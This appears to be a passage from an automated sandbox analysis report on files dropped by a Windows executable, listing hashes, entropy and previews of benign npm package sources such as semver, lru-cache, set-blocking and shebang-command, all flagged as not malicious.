              Preview:const numeric = /^[0-9]+$/.const compareIdentifiers = (a, b) => {. const anum = numeric.test(a). const bnum = numeric.test(b).. if (anum && bnum) {. a = +a. b = +b. }.. return a === b ? 0. : (anum && !bnum) ? -1. : (bnum && !anum) ? 1. : a < b ? -1. : 1.}..const rcompareIdentifiers = (a, b) => compareIdentifiers(b, a)..module.exports = {. compareIdentifiers,. rcompareIdentifiers,.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):324
              Entropy (8bit):4.389876286259663
              Encrypted:false
              SSDEEP:
              MD5:CC13AEF241206ECA8B7D176659393A57
              SHA1:19A8AD4D2C32F4386402BD9EB235DF80C73A8F75
              SHA-256:481B04E12442738B4621D07FAD8EE5B87BFF5BAB69830458731FA91611035972
              SHA-512:7347AB342470DA97B586DEC713A56F0961AD8D6DBE87EB524675D48C19CBB6DFAF9635DC7291EACD5C2E3D3A38108736D95905FEC0C0E1F7718172978B0A1638
              Malicious:false
              Reputation:unknown
              Preview:// parse out just the options we care about.const looseOption = Object.freeze({ loose: true }).const emptyOpts = Object.freeze({ }).const parseOptions = options => {. if (!options) {. return emptyOpts. }.. if (typeof options !== 'object') {. return looseOption. }.. return options.}.module.exports = parseOptions.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7690
              Entropy (8bit):5.4772583474440975
              Encrypted:false
              SSDEEP:
              MD5:532671BE9ED087EC0586BB36C222008B
              SHA1:A0AB45898A046419A6D8758F263A31F7E79E3F50
              SHA-256:C179E4BB92AA0DA3399166872D494DDB3C628CEC144DAE1EADCA4886007A7024
              SHA-512:B91F6AE7028BACDA3D921080B7EC15ADF9E2F86916EFE000C97C496AA4A9A73F1882AC308C4D7507412B334BE3C578F5C66A5A06C71A365D44820A3BFECE5241
              Malicious:false
              Reputation:unknown
              Preview:const {. MAX_SAFE_COMPONENT_LENGTH,. MAX_SAFE_BUILD_LENGTH,. MAX_LENGTH,.} = require('./constants').const debug = require('./debug').exports = module.exports = {}..// The actual regexps go on exports.re.const re = exports.re = [].const safeRe = exports.safeRe = [].const src = exports.src = [].const t = exports.t = {}.let R = 0..const LETTERDASHNUMBER = '[a-zA-Z0-9-]'..// Replace some greedy regex tokens to prevent regex dos issues. These regex are.// used internally via the safeRe object since all inputs in this library get.// normalized first to trim and collapse all extra whitespace. The original.// regexes are exported for userland consumption and lower level usage. A.// future breaking change could export the safer regex only with a note that.// all input should have extra whitespace removed..const safeRegexReplacements = [. ['\\s', 1],. ['\\d', MAX_LENGTH],. [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH],.]..const makeSafeRegex = (value) => {. for (const [token, max] of safeRege
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):8186
              Entropy (8bit):4.908640295218627
              Encrypted:false
              SSDEEP:
              MD5:48445C2C358DBFFCE2099AAF18F5A645
              SHA1:B8B9A8EC246E3EF6FEC472A55AB97CD03E0CE0F2
              SHA-256:F527D2386A6266B9BF67D264194948CF741B12DAA19FEA19E3537414EE31F9A7
              SHA-512:F712B721509485B87A810802A48EEF1C4EBD06276D0E28CD4F00671E76E3C0F9FA1BBF872DA2C93FB5B3BCF8146264C0CBC8D09AFD8E3B9AA4A92F901DF11E7A
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..// A linked list to keep track of recently-used-ness.const Yallist = require('yallist')..const MAX = Symbol('max').const LENGTH = Symbol('length').const LENGTH_CALCULATOR = Symbol('lengthCalculator').const ALLOW_STALE = Symbol('allowStale').const MAX_AGE = Symbol('maxAge').const DISPOSE = Symbol('dispose').const NO_DISPOSE_ON_SET = Symbol('noDisposeOnSet').const LRU_LIST = Symbol('lruList').const CACHE = Symbol('cache').const UPDATE_AGE_ON_GET = Symbol('updateAgeOnGet')..const naiveLength = () => 1..// lruList is a yallist where the head is the youngest.// item, and the tail is the oldest. the list contains the Hit.// objects as the entries..// Each Hit object has a reference to its Yallist.Node. This.// never changes..//.// cache is a Map (or PseudoMap) that matches the keys to.// the Yallist.Node object..class LRUCache {. constructor (options) {. if (typeof options === 'number'). options = { max: options }.. if (!options). options = {}.. if (option
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):705
              Entropy (8bit):4.630859055350454
              Encrypted:false
              SSDEEP:
              MD5:5FACCE3B29B46C909E27BD642D950A3F
              SHA1:05256617890052107B341ACF6CBE16FD9F22F86C
              SHA-256:B06071B99BEBE6CC7F7716F65ED4F36FF54AAF78D74EA0BEC72F9029A8E2C215
              SHA-512:7443EF7CDA3D0D14CEE45927F0951F3CDB7D06D3096CFFB30CC866A429C99AA9C403420B79CBCDDE4720E97C5629EB5C19A17B1ABE3F6958FBD2C02A997578FC
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "lru-cache",. "description": "A cache object that deletes the least-recently-used items.",. "version": "6.0.0",. "author": "Isaac Z. Schlueter <i@izs.me>",. "keywords": [. "mru",. "lru",. "cache". ],. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags". },. "main": "index.js",. "repository": "git://github.com/isaacs/node-lru-cache.git",. "devDependencies": {. "benchmark": "^2.1.4",. "tap": "^14.10.7". },. "license": "ISC",. "dependencies": {. "yallist": "^4.0.0". },. "files": [. "index.js". ],. "engines": {. "node": ">=10". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1739
              Entropy (8bit):4.486359769798687
              Encrypted:false
              SSDEEP:
              MD5:6A040A2696F8E96F92137EBC4242EF7B
              SHA1:08FB3443AE3BD70A8B9FE92AD4AD36BCBB7BE5A5
              SHA-256:A7078735E638B5248E11FB104F06341AE6854F15913D308D3F0ACFA4A836AA42
              SHA-512:73A1E389DAAA17B1280FA488E936298BCE5D9F0E0387CE888B23A720C3C5CC1D62D044C904B90C319808D46CF46495D8287E7A2B94FB97EB73691982EA02BD19
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "semver",. "version": "7.5.4",. "description": "The semantic version parser used by npm.",. "main": "index.js",. "scripts": {. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.17.0",. "tap": "^16.0.0". },. "license": "ISC",. "repository": {. "type": "git",. "url": "https://github.com/npm/node-semver.git". },. "bin": {. "semver": "bin/semver.js". },. "files": [. "bin/",. "lib/",. "classes/",. "functions/",. "internal/",. "ranges/",. "index.js",. "preload.js",. "range.bnf". ],. "tap": {. "timeout": 30,. "coverage-map": "map.js",. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "engines": {. "node": ">=10". },.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):69
              Entropy (8bit):4.459993935591871
              Encrypted:false
              SSDEEP:
              MD5:A9FDDC15CDA0D52DB33CFB922545DE04
              SHA1:14FCBEDA941017ACA47B9D4A613CD186DEB6441D
              SHA-256:4117401437CCB64A0438E0B65F92215706FB892A4A1161367FBEE215A4627716
              SHA-512:DD2A1A07C9B2C8447F1FB1BC377A036557D010D6D0213801A7081583103A6C0DF314E34022A32DC8FD8B8916EAF7379C84BEE1CF3CA9CE4F48766F50C7471AAB
              Malicious:false
              Reputation:unknown
              Preview:// XXX remove in v8 or beyond.module.exports = require('./index.js').
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):619
              Entropy (8bit):4.24704903804356
              Encrypted:false
              SSDEEP:
              MD5:76D83B46734A4604DA9DF9998FE7D19E
              SHA1:5C6F063E0EC60F2D04686F73A12BA5F389988A2B
              SHA-256:ED628FDAFF64BE366D07F6CC4559EAE4DE109826F743EA7F5E1588C370BCA49A
              SHA-512:40559A2C4890535B3F265AC188E40C0E38E43CF99C82B576117419DFDF05F3075B1ACCEE5609A4A890BFC8F279CC40D718AB2016D791527A4623811DE132E71B
              Malicious:false
              Reputation:unknown
              Preview:range-set ::= range ( logical-or range ) *.logical-or ::= ( ' ' ) * '||' ( ' ' ) *.range ::= hyphen | simple ( ' ' simple ) * | ''.hyphen ::= partial ' - ' partial.simple ::= primitive | partial | tilde | caret.primitive ::= ( '<' | '>' | '>=' | '<=' | '=' ) partial.partial ::= xr ( '.' xr ( '.' xr qualifier ? )? )?.xr ::= 'x' | 'X' | '*' | nr.nr ::= '0' | [1-9] ( [0-9] ) *.tilde ::= '~' partial.caret ::= '^' partial.qualifier ::= ( '-' pre )? ( '+' build )?.pre ::= parts.build ::= parts.parts ::= part ( '.' part ) *.part ::= nr | [-0-9A-Za-z]+.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):217
              Entropy (8bit):4.398234423194857
              Encrypted:false
              SSDEEP:
              MD5:F5279B6DF246C6A31456515749287981
              SHA1:4F69FB02E28923FE7126531D80862DC85BF94C19
              SHA-256:3584A1C39F7482B8A2733CC4630777A6881C627CF2FB1065E7B3387134AE0899
              SHA-512:51AF17FD45BD230BFCE1BC1375EC9EB1C0BC3DDA5B4B7A425C0251C1B275E81544C4ABF80246C8372524DF40A086557621138A107A9749A9D77C82884F9AFBE4
              Malicious:false
              Reputation:unknown
              Preview:// Determine if version is greater than all the versions possible in the range..const outside = require('./outside').const gtr = (version, range, options) => outside(version, range, '>', options).module.exports = gtr.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):210
              Entropy (8bit):4.448993199085843
              Encrypted:false
              SSDEEP:
              MD5:1039F3D91B86B927A56BDBBFC6F16947
              SHA1:3763224A30A86582B56A4CDF1EBAA97B5038E1C8
              SHA-256:64F5052C8850641901E2946AF711DE41F4A20C2FFEB4671C08D305C525D4FA22
              SHA-512:4B6C1AD9D76CE060E8EAE332F920403F495BB4FFD8227BBAE14E7A60A3BA13B3FD6D037C1AF42D04F17736DF81373369516B7FF3C57D94E1A2826D441D60EE9A
              Malicious:false
              Reputation:unknown
              Preview:const Range = require('../classes/range').const intersects = (r1, r2, options) => {. r1 = new Range(r1, options). r2 = new Range(r2, options). return r1.intersects(r2, options).}.module.exports = intersects.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):213
              Entropy (8bit):4.394460276573096
              Encrypted:false
              SSDEEP:
              MD5:9B1635BD6D604358D733514B28CC8B29
              SHA1:D4948B6F660390895F8AC0CFE4CAD97BC1F15190
              SHA-256:9B2B8CAD227317839A7E47C5B835A7F45E3E861270CA3E335C2BB693C1BD425A
              SHA-512:53782C3A28EBC0C68D365AB5AC25285DACB77A11F9D2F363C09CEF2966292BF85CC7779EBB6F31C2FE1058B82A114653FCF1EBEBAADF33A6457AAA25364E1EB9
              Malicious:false
              Reputation:unknown
              Preview:const outside = require('./outside').// Determine if version is less than all the versions possible in the range.const ltr = (version, range, options) => outside(version, range, '<', options).module.exports = ltr.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):579
              Entropy (8bit):4.56750149483721
              Encrypted:false
              SSDEEP:
              MD5:6813760C0301CEF7A84E2CEA77E91641
              SHA1:4DCEF246781158EEF12758041375D1BCE437A383
              SHA-256:CBC560048C06FB1A3C75412638BF89DDB9782F373A744FFC4D8F2AA0B8D11C3C
              SHA-512:39A4D2E14C604F7F0C30AD4976EE9F08DB39B2F3E0BFAAD966B0E8FE023AADB8708FA7E9CE0AAD55871B34EB9661DACB5AE5939CA5495951C202118D2136B1FC
              Malicious:false
              Reputation:unknown
              Preview:const SemVer = require('../classes/semver').const Range = require('../classes/range')..const maxSatisfying = (versions, range, options) => {. let max = null. let maxSV = null. let rangeObj = null. try {. rangeObj = new Range(range, options). } catch (er) {. return null. }. versions.forEach((v) => {. if (rangeObj.test(v)) {. // satisfies(v, range, options). if (!max || maxSV.compare(v) === -1) {. // compare(max, v, true). max = v. maxSV = new SemVer(max, options). }. }. }). return max.}.module.exports = maxSatisfying.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):577
              Entropy (8bit):4.510123167756403
              Encrypted:false
              SSDEEP:
              MD5:D724F0E2C17A599C3B82EC456BB60348
              SHA1:2155AEA4B92343159E1B803F878A47297CA9AA66
              SHA-256:9EA81EB30019B58FD6218FF40F565AF60E9E52574AC1CC882E6841FC75B3E8BD
              SHA-512:3330356B84605AC3E575A24DD94FD42E7687303658E39D5CFA7216C7F3708CA9581706F8A9C98AF9A4E522A919DBC60A3D73C45E1DFC1F697B9DEDE94BD6B56C
              Malicious:false
              Reputation:unknown
              Preview:const SemVer = require('../classes/semver').const Range = require('../classes/range').const minSatisfying = (versions, range, options) => {. let min = null. let minSV = null. let rangeObj = null. try {. rangeObj = new Range(range, options). } catch (er) {. return null. }. versions.forEach((v) => {. if (rangeObj.test(v)) {. // satisfies(v, range, options). if (!min || minSV.compare(v) === 1) {. // compare(min, v, true). min = v. minSV = new SemVer(min, options). }. }. }). return min.}.module.exports = minSatisfying.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1500
              Entropy (8bit):4.3976119329028585
              Encrypted:false
              SSDEEP:
              MD5:5883D374BB5D81494A79536F8D15C7B1
              SHA1:04DAB32F676A52EE4C81F440EB1B5D6C7511AFA5
              SHA-256:639D348B2C5B0E1690C790FBF6DAA4A619EBCF52A1B675002FDB8B4B99823500
              SHA-512:1D9D957FC3ED7F68C1B6602043987CDB7DE0B60589028FB8659886DFD5DAE56BF2FDDED39BC6DC51D7DF9A4FB8FAAFD21E1630044B2183CF3A32E1BCC1BBDF08
              Malicious:false
              Reputation:unknown
              Preview:const SemVer = require('../classes/semver').const Range = require('../classes/range').const gt = require('../functions/gt')..const minVersion = (range, loose) => {. range = new Range(range, loose).. let minver = new SemVer('0.0.0'). if (range.test(minver)) {. return minver. }.. minver = new SemVer('0.0.0-0'). if (range.test(minver)) {. return minver. }.. minver = null. for (let i = 0; i < range.set.length; ++i) {. const comparators = range.set[i].. let setMin = null. comparators.forEach((comparator) => {. // Clone to avoid manipulating the comparator's semver object.. const compver = new SemVer(comparator.semver.version). switch (comparator.operator) {. case '>':. if (compver.prerelease.length === 0) {. compver.patch++. } else {. compver.prerelease.push(0). }. compver.raw = compver.format(). /* fallthrough */. case '':. case '>=':. if (!setMin || gt(co
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2190
              Entropy (8bit):4.490231255457267
              Encrypted:false
              SSDEEP:
              MD5:C19E4C92ABD2676981BF6337629109AC
              SHA1:C6F8B84EBD967E5479159E2F876F3BA27530EB97
              SHA-256:94ADBE6D54F2DA683D27C3C5EE7C98223400D96AD57A5851EB069743E11E8538
              SHA-512:D2C6E6D494EEA38B248DF5520C27CED6F3668E5AE8257512A4FAD075007BC22419A62046D17F1EDB23C2A043F46B8CD2924FEBAEECDCC3E4EB0B1C08EEC05640
              Malicious:false
              Reputation:unknown
              Preview:const SemVer = require('../classes/semver').const Comparator = require('../classes/comparator').const { ANY } = Comparator.const Range = require('../classes/range').const satisfies = require('../functions/satisfies').const gt = require('../functions/gt').const lt = require('../functions/lt').const lte = require('../functions/lte').const gte = require('../functions/gte')..const outside = (version, range, hilo, options) => {. version = new SemVer(version, options). range = new Range(range, options).. let gtfn, ltefn, ltfn, comp, ecomp. switch (hilo) {. case '>':. gtfn = gt. ltefn = lte. ltfn = lt. comp = '>'. ecomp = '>='. break. case '<':. gtfn = lt. ltefn = gte. ltfn = gt. comp = '<'. ecomp = '<='. break. default:. throw new TypeError('Must provide a hilo val of "<" or ">"'). }.. // If it satisfies the range it is not outside. if (satisfies(version, range, options)) {. return false. }.. // From now on
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1341
              Entropy (8bit):4.514282733168679
              Encrypted:false
              SSDEEP:
              MD5:3A907BB4AA4D1894BDA5CC022857DF65
              SHA1:BC651999D477C5698289ADCD2ED8773CF7A2DA11
              SHA-256:9120EA55B47227123790FC401F7496A60D85791D010A4311BB34D071F8718456
              SHA-512:A0561BF9A1DA2859512BA1CD9F20780CEE448751CE7CB69473C1FD3101193E526842314039A7F08979B1E80925AE35BA9AC8AA0F7AB7A3548FE3B60491D09928
              Malicious:false
              Reputation:unknown
              Preview:// given a set of versions and a range, create a "simplified" range.// that includes the same versions that the original range does.// If the original range is shorter than the simplified one, return that..const satisfies = require('../functions/satisfies.js').const compare = require('../functions/compare.js').module.exports = (versions, range, options) => {. const set = []. let first = null. let prev = null. const v = versions.sort((a, b) => compare(a, b, options)). for (const version of v) {. const included = satisfies(version, range, options). if (included) {. prev = version. if (!first) {. first = version. }. } else {. if (prev) {. set.push([first, prev]). }. prev = null. first = null. }. }. if (first) {. set.push([first, null]). }.. const ranges = []. for (const [min, max] of set) {. if (min === max) {. ranges.push(min). } else if (!max && min === v[0]) {. ranges.push('*'). } else if (!max
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7510
              Entropy (8bit):4.688611794095084
              Encrypted:false
              SSDEEP:
              MD5:8ECF4B5A0C4A54FB8A621A690238746C
              SHA1:94DCE217BB98598DAD72F194DE19C5E2F3246D7B
              SHA-256:47A24CE992A4CCF180FF865A5BE97DA6E33344EE0544DA87DAC9B6AC50323E8B
              SHA-512:D01E3D02C6F8DA832657DD1D8BA8D8F5E1B8229D5FB107D8D1C3AB7311CDB191FDFF9ECE92592598741CC9AC66848CD1F000399E378FEB593AD87BEE0E240B5A
              Malicious:false
              Reputation:unknown
              Preview:const Range = require('../classes/range.js').const Comparator = require('../classes/comparator.js').const { ANY } = Comparator.const satisfies = require('../functions/satisfies.js').const compare = require('../functions/compare.js')..// Complex range `r1 || r2 || ...` is a subset of `R1 || R2 || ...` iff:.// - Every simple range `r1, r2, ...` is a null set, OR.// - Every simple range `r1, r2, ...` which is not a null set is a subset of.// some `R1, R2, ...`.//.// Simple range `c1 c2 ...` is a subset of simple range `C1 C2 ...` iff:.// - If c is only the ANY comparator.// - If C is only the ANY comparator, return true.// - Else if in prerelease mode, return false.// - else replace c with `[>=0.0.0]`.// - If C is only the ANY comparator.// - if in prerelease mode, return true.// - else replace C with `[>=0.0.0]`.// - Let EQ be the set of = comparators in c.// - If EQ is more than one, return true (null set).// - Let GT be the highest > or >= comparator in c.// - Let LT be the
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):268
              Entropy (8bit):4.654298672676647
              Encrypted:false
              SSDEEP:
              MD5:045401FED046B3ED05E1F5E7B56EE970
              SHA1:4D609454B2E81450D85BE8F56109AF8BA6B61B92
              SHA-256:C809EF2C27B2E9E47CEA6781D1B61E92ADABCCB139ABFAC009DF253CFC4F6FD3
              SHA-512:88B6F9FBB485049767807714E6881D75D88B06198E602408022F8017A16B0A43C75E6274E8C0728944F09CDA8E43E78284EEA74D9D007CD3BF40EA6EDCF9AF26
              Malicious:false
              Reputation:unknown
              Preview:const Range = require('../classes/range')..// Mostly just for testing and legacy API reasons.const toComparators = (range, options) =>. new Range(range, options).set. .map(comp => comp.map(c => c.value).join(' ').trim().split(' '))..module.exports = toComparators.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):312
              Entropy (8bit):4.555760117843104
              Encrypted:false
              SSDEEP:
              MD5:1DC94773E37EE1D033F066FFD157BCB6
              SHA1:7A1C6AFBE83E28264A384B43AB8F6765F7649114
              SHA-256:4F6B4EB0D05FDA0E9774ECB1B7464D6FC25C75F1D9DF3423ACE4CBB2EC466FC4
              SHA-512:AE86B83933F7A9F3016F963576A57FC65BEA9ECC309B07ACBA6E8D41B98F518BAA8257DD2CDA8F1609A6C115EA60AD00E1AFF4FE9ECCFFCE3D505645B3FBCC63
              Malicious:false
              Reputation:unknown
              Preview:const Range = require('../classes/range').const validRange = (range, options) => {. try {. // Return '*' instead of '' so that truthiness works.. // This will throw if it's invalid anyway. return new Range(range, options).range || '*'. } catch (er) {. return null. }.}.module.exports = validRange.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):731
              Entropy (8bit):5.00963536194009
              Encrypted:false
              SSDEEP:
              MD5:8FD106383180F7BBB8F534414FDF7D35
              SHA1:47EDC4B4E929248AD6E423BF3A6736C320A3277C
              SHA-256:365496CA1F56DA40B23C9815FC40FA9005847B2F8F8FD1C1A4929EF25EC8CD1D
              SHA-512:113A0FB1A7939F59BF84A29A58E349870AA3BC85AFADAE428D631AC7EC8258BAC8375FE31522F03E484DEBC562430603BAEB7D28256719140A26EC5ACA7E9104
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2016, Contributors..Permission to use, copy, modify, and/or distribute this software.for any purpose with or without fee is hereby granted, provided.that the above copyright notice and this permission notice.appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES.OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE.LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES.OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,.WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,.ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):252
              Entropy (8bit):4.753412888415345
              Encrypted:false
              SSDEEP:
              MD5:17DA66B83566850037AA069584B34BB4
              SHA1:1F4153FEBABA6617978EB38BAFEDFCA5CECB9EE3
              SHA-256:8B238F1DE62BB2A7B35A9E6B0364A64CE0F357CB63251580FF5A25429712E1D1
              SHA-512:7F522988DE4E766529593600ADC6942551A44A9333D8F988C27299F02B7E63E38773B3AD3D73B807135EF1A5903E8BFF223845D8908FE0028E460DEA8075AD14
              Malicious:false
              Reputation:unknown
              Preview:module.exports = function (blocking) {. [process.stdout, process.stderr].forEach(function (stream) {. if (stream._handle && stream.isTTY && typeof stream._handle.setBlocking === 'function') {. stream._handle.setBlocking(blocking). }. }).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):985
              Entropy (8bit):4.731084162433193
              Encrypted:false
              SSDEEP:
              MD5:E37224B4C865B4464D6D41B1F8A870A4
              SHA1:1FD9E7BBE562D20EE078877BA14AAEF71A6DEA6A
              SHA-256:E0C598215C66F2C35EDBC3CB2A3433D45F9D4B726524C095C93E7376D87A3BCE
              SHA-512:44B7F134BD5101B83B997B7BB04DCE863CD041704A5E0AA1B8E8FCD26E4E230AA785B6A590867DB647DC8BC187572A5437A3603C6667F7D05A50F76FF39479BC
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "set-blocking",. "version": "2.0.0",. "description": "set blocking stdio and stderr ensuring that terminal output does not truncate",. "main": "index.js",. "scripts": {. "pretest": "standard",. "test": "nyc mocha ./test/*.js",. "coverage": "nyc report --reporter=text-lcov | coveralls",. "version": "standard-version". },. "repository": {. "type": "git",. "url": "git+https://github.com/yargs/set-blocking.git". },. "keywords": [. "flush",. "terminal",. "blocking",. "shim",. "stdio",. "stderr". ],. "author": "Ben Coe <ben@npmjs.com>",. "license": "ISC",. "bugs": {. "url": "https://github.com/yargs/set-blocking/issues". },. "homepage": "https://github.com/yargs/set-blocking#readme",. "devDependencies": {. "chai": "^3.5.0",. "coveralls": "^2.11.9",. "mocha": "^2.4.5",. "nyc": "^6.4.4",. "standard": "^7.0.1",. "standard-version": "^2.2.1". },. "files": [. "index.js",. "LICENSE.txt". ].}
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):387
              Entropy (8bit):4.968509010552548
              Encrypted:false
              SSDEEP:
              MD5:58CAF971492FBEA87FAC314789C356A3
              SHA1:1649499003B604EDC6A8F83F70C039679D4A10F8
              SHA-256:D98C3AA373C72016E990A723E919AF495423BC4AC1DAA0736C5F45FAC0418D7F
              SHA-512:91EEA5DD50427D8B047E0A37A1E17E1CF855B97D63A257DD6347145936100C7E13E7D2804EBCF10BC0F407090A4442E3D6BD98F7CD46A63762A1BF62F2BBC8A9
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.const shebangRegex = require('shebang-regex');..module.exports = (string = '') => {..const match = string.match(shebangRegex);...if (!match) {...return null;..}...const [path, argument] = match[0].replace(/#! ?/, '').split(' ');..const binary = path.split('/').pop();...if (binary === 'env') {...return argument;..}...return argument ? `${binary} ${argument}` : binary;.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text, with very long lines (460)
              Category:dropped
              Size (bytes):1116
              Entropy (8bit):5.108855297830728
              Encrypted:false
              SSDEEP:
              MD5:05240CD20679544D6E90FCFF746425BC
              SHA1:DB85A00AB8DAAF90050B20B30266C92A58CB71F2
              SHA-256:69DEE148A2CC470554DFA7142E830662062394D0FE67CDDD379ABA90DC60D6B3
              SHA-512:4109A4E0CFE37C1732CA099CAA4BD1106C4E298A9F1DD50828CEF8067435CC668DAB44BE7D4A4DA3FBAFDDA5AEEE22AE5C42416CF79D0996089783CB13B2FF4A
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) Kevin M.rtensson <kevinmartensson@gmail.com> (github.com/kevva)..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):558
              Entropy (8bit):4.832006125267144
              Encrypted:false
              SSDEEP:
              MD5:3CB957E2CDE1C403A7889E1F69653E27
              SHA1:2E2395A2E489846382E5CEFDF011DCD7CACB82A5
              SHA-256:44DE390AE5ED6C5F9758B8B9C90B93FA53977D5361731600429F1DE08F4B3F30
              SHA-512:4522E78675C42FE7DC2C363AA57841DB393A47AAD9FC94BA5D6DCEFA932DA2C477EC8BEA5EAF790511B1C438F94A403DD0041B5B9D005D9951F906EFFD53B9AE
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "shebang-command",.."version": "2.0.0",.."description": "Get the command from a shebang",.."license": "MIT",.."repository": "kevva/shebang-command",.."author": {..."name": "Kevin M.rtensson",..."email": "kevinmartensson@gmail.com",..."url": "github.com/kevva"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava"..},.."files": [..."index.js"..],.."keywords": [..."cmd",..."command",..."parse",..."shebang"..],.."dependencies": {..."shebang-regex": "^3.0.0"..},.."devDependencies": {..."ava": "^2.3.0",..."xo": "^0.24.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):42
              Entropy (8bit):4.558518613048908
              Encrypted:false
              SSDEEP:
              MD5:E5B247C6C2702052B9A4DF02D85FA819
              SHA1:F0E2954D7F9F8F5CE6EA0F9AF0F64F9B4F9F2D53
              SHA-256:E91E547BAD596A389841FD7938BFCBD22AF82F44A01F794E86878E4FF0274250
              SHA-512:4D5A0BA9B322FDB0092FB1DF2C79A9BB2A71C303EDF9322E644B5D69517B1F75112EB710F68C125A34B4A3942A2B5946B055B4B302959EEC8BD21C532A7FA4B8
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.module.exports = /^#!(.*)/;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (460)
              Category:dropped
              Size (bytes):1109
              Entropy (8bit):5.0681506929270785
              Encrypted:false
              SSDEEP:
              MD5:915042B5DF33C31A6DB2B37EADAA00E3
              SHA1:5AAF48196DDD4D007A3067AA7F30303CA8E4B29C
              SHA-256:48DA2F39E100D4085767E94966B43F4FA95FF6A0698FBA57ED460914E35F94A0
              SHA-512:9C8B2DEF76AE5FFE4D636166BF9635D7ABD69CDAC4BF819A2145F7969646D39AE95C96364BC117F9FA544B98518C294233455D4F665AF430C75D70798DD4AB13
              Malicious:false
              Reputation:unknown
